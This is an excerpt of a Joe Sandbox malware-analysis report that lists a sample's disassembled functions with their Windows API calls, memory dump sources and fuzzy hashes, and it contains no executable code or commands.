                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3659485706-0
                                                                                                                                                  • Opcode ID: cef8d7c36a1cc281917b3d286024d118431c121cb533efc358e33715f05c58f5
                                                                                                                                                  • Instruction ID: 42d1ff19b42d4dd855f78dbf13e3d8c427035282adcdd002c13888698d5010eb
                                                                                                                                                  • Opcode Fuzzy Hash: cef8d7c36a1cc281917b3d286024d118431c121cb533efc358e33715f05c58f5
                                                                                                                                                  • Instruction Fuzzy Hash: 91C16A71604301DFC714DF29C48096ABBE4FF89318F148AAEF8999B352D734E946CB86
                                                                                                                                                  Function 00478093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 004780C3
                                                                                                                                                  • CoUninitialize.OLE32 ref: 004780CE
                                                                                                                                                    • Part of subcall function 0045D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 004780D9
                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 004783AA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 780911581-0
                                                                                                                                                  • Opcode ID: 75a80dea8493d1a2931086d19cc81c6010b0982a28c841e76fcbb912b52bff69
                                                                                                                                                  • Instruction ID: 8f3373c4a7a5232ad993fe33ba140746eecbff111afdbebb2f840ccc5d4b94f2
                                                                                                                                                  • Opcode Fuzzy Hash: 75a80dea8493d1a2931086d19cc81c6010b0982a28c841e76fcbb912b52bff69
                                                                                                                                                  • Instruction Fuzzy Hash: 2CA17C756047019FCB10EF15C485B6AB7E4BF89758F04845EF999AB3A2CB38EC05CB4A
                                                                                                                                                  Function 0045687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Variant$AllocClearCopyInitString
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2808897238-0
                                                                                                                                                  • Opcode ID: 48c7ad8db9939df1b91deb5faf574402407bc3b3f46c3c8fc36f7f8110f9ebc7
                                                                                                                                                  • Instruction ID: e8b204b61dde8909cc9ebe033208aa5324eaf332f6d31eb9d5c273134af525d6
                                                                                                                                                  • Opcode Fuzzy Hash: 48c7ad8db9939df1b91deb5faf574402407bc3b3f46c3c8fc36f7f8110f9ebc7
                                                                                                                                                  • Instruction Fuzzy Hash: 9551C5747003019BDB20AF66D49162AB3E5AF45315F61C82FE986EB293DA38DC49870D
                                                                                                                                                  Function 004769AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 004769D1
                                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 004769E1
                                                                                                                                                    • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                    • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00476A45
                                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00476A51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$__itow__swprintfsocket
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2214342067-0
                                                                                                                                                  • Opcode ID: 5f9ca6de3472ca1f7af679026d0f929c5a37830e5e67d00f46ee422ea10bce61
                                                                                                                                                  • Instruction ID: c17afa0f8bd668a9c60690327d1e2da2a99666ddae487d2dea1163d2ceff8f1e
                                                                                                                                                  • Opcode Fuzzy Hash: 5f9ca6de3472ca1f7af679026d0f929c5a37830e5e67d00f46ee422ea10bce61
                                                                                                                                                  • Instruction Fuzzy Hash: A241C175740200AFEB50BF25CC86F6A37A49F05B18F04C56EFA59AB3C3DA789D008B59
                                                                                                                                                  Function 0047641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0048F910), ref: 004764A7
                                                                                                                                                  • _strlen.LIBCMT ref: 004764D9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _strlen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4218353326-0
                                                                                                                                                  • Opcode ID: 06a60a28df12286d3fae1664d3672c1810fd433a8f21eb32722a08b1b953fb3e
                                                                                                                                                  • Instruction ID: ea6fe9a4da80eb7d3c3fcd9d99711482a179dafd9654a2bb84a00921c454041b
                                                                                                                                                  • Opcode Fuzzy Hash: 06a60a28df12286d3fae1664d3672c1810fd433a8f21eb32722a08b1b953fb3e
                                                                                                                                                  • Instruction Fuzzy Hash: F341B971600104ABCB14EB65EC85EEEB7AAAF44314F51C16FF919A72D3DB38AD04CB58
                                                                                                                                                  Function 00AB34FF Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00AB354C
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00AB35D5
                                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00AB35E7
                                                                                                                                                  • __freea.LIBCMT ref: 00AB35F0
                                                                                                                                                    • Part of subcall function 00AB32FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00AB332C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2652629310-0
                                                                                                                                                  • Opcode ID: 9d228d02c6672074d0d9a30dfaa33ac21c3d7a5038a504c5e35dbfaa02eea117
                                                                                                                                                  • Instruction ID: 55ae8c1730044b7c943ac052e168ea9376a41ff2cd3f92c9c9e3a7c3b891db50
                                                                                                                                                  • Opcode Fuzzy Hash: 9d228d02c6672074d0d9a30dfaa33ac21c3d7a5038a504c5e35dbfaa02eea117
                                                                                                                                                  • Instruction Fuzzy Hash: AC318B72A0021AAFDF259FA4DC45DEE7BA9EF40310F054268E804D6252EB36CE51CB90
                                                                                                                                                  Function 00488851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004888DE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InvalidateRect
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 634782764-0
                                                                                                                                                  • Opcode ID: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                                                                                                                                  • Instruction ID: 90478ffdb7761b137305382920b909693c76b6b3f52a4c92a5928a084f4746aa
                                                                                                                                                  • Opcode Fuzzy Hash: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                                                                                                                                  • Instruction Fuzzy Hash: FA31E574600109AEEB20BA18CC45FBE77A4FB09310FD4492FF911E62A1CB78A9409B5F
                                                                                                                                                  Function 0048AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 0048AB60
                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0048ABD6
                                                                                                                                                  • PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                                                                                                                                                  • MessageBeep.USER32(00000000), ref: 0048AC57
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1352109105-0
                                                                                                                                                  • Opcode ID: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                                                                                                                                  • Instruction ID: 50dfaebed92d8c5328ac5b6136a8f20cc44f4ea80b7df437f97558f7e7d7bb38
                                                                                                                                                  • Opcode Fuzzy Hash: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                                                                                                                                  • Instruction Fuzzy Hash: BA419130600118DFEB11EF58D884A6E7BF5FB48300F1888BBE9149B361D7B4E861CB5A
                                                                                                                                                  Function 00460AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00460B27
                                                                                                                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 00460B43
                                                                                                                                                  • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00460BA9
                                                                                                                                                  • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00460BFB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 432972143-0
                                                                                                                                                  • Opcode ID: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                                                                                                                                  • Instruction ID: 03210f4579a9838ef25ae451a3721c68a31d2690f75eb3d3b5678938ddfb0b3b
                                                                                                                                                  • Opcode Fuzzy Hash: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                                                                                                                                  • Instruction Fuzzy Hash: 65315970D402086EFB308AA98C05BFFBBA5AB45718F08826BE491512D2E37DA945975F
                                                                                                                                                  Function 00460C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00460C66
                                                                                                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00460C82
                                                                                                                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 00460CE1
                                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00460D33
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 432972143-0
                                                                                                                                                  • Opcode ID: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                                                                                                                                  • Instruction ID: af81f782b9f2afb763cf5164547ef1363043bc47ca8f91e08b3a13bd089ac861
                                                                                                                                                  • Opcode Fuzzy Hash: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                                                                                                                                  • Instruction Fuzzy Hash: 963135309402086EFF388B658804BBFBB66EB45310F04472FE481622D1E33D9949D75B
                                                                                                                                                  Function 004361C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004361FB
                                                                                                                                                  • __isleadbyte_l.LIBCMT ref: 00436229
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00436257
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043628D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3058430110-0
                                                                                                                                                  • Opcode ID: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                                                                                                                                                  • Instruction ID: a268d3a3e6e94a3a382490fbdf87b59e774afa85b5b6ffc4d13239602402ad5c
                                                                                                                                                  • Opcode Fuzzy Hash: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                                                                                                                                                  • Instruction Fuzzy Hash: 8831E230600246BFDF219F65CC48B6B7BB9BF4A310F17906AE82487291DB34D850D754
                                                                                                                                                  Function 00484EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetForegroundWindow.USER32 ref: 00484F02
                                                                                                                                                    • Part of subcall function 00463641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046365B
                                                                                                                                                    • Part of subcall function 00463641: GetCurrentThreadId.KERNEL32 ref: 00463662
                                                                                                                                                    • Part of subcall function 00463641: AttachThreadInput.USER32(00000000,?,00465005), ref: 00463669
                                                                                                                                                  • GetCaretPos.USER32(?), ref: 00484F13
                                                                                                                                                  • ClientToScreen.USER32(00000000,?), ref: 00484F4E
                                                                                                                                                  • GetForegroundWindow.USER32 ref: 00484F54
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2759813231-0
                                                                                                                                                  • Opcode ID: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                                                                                                                                                  • Instruction ID: 1d2def75fb9c8d520c96e6582531674793c8a8545b0fc50cd96dbe06c6996e1e
                                                                                                                                                  • Opcode Fuzzy Hash: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                                                                                                                                                  • Instruction Fuzzy Hash: 38314FB2D00108AFCB00EFA6C8819EFB7F9EF84304F00446EE515E7242EA759E058BA5
                                                                                                                                                  Function 0048C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                  • GetCursorPos.USER32(?), ref: 0048C4D2
                                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0043B9AB,?,?,?,?,?), ref: 0048C4E7
                                                                                                                                                  • GetCursorPos.USER32(?), ref: 0048C534
                                                                                                                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0043B9AB,?,?,?), ref: 0048C56E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2864067406-0
                                                                                                                                                  • Opcode ID: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                                                                                                                                                  • Instruction ID: 2973952025af683afbaf652597196eb0b77ee17814688135882e4792ee887bd6
                                                                                                                                                  • Opcode Fuzzy Hash: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                                                                                                                                                  • Instruction Fuzzy Hash: CE319335500028FFCF159F58C898EAF7BB5EB09310F44486AF9059B361C735AD50DBA8
                                                                                                                                                  Function 00458656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
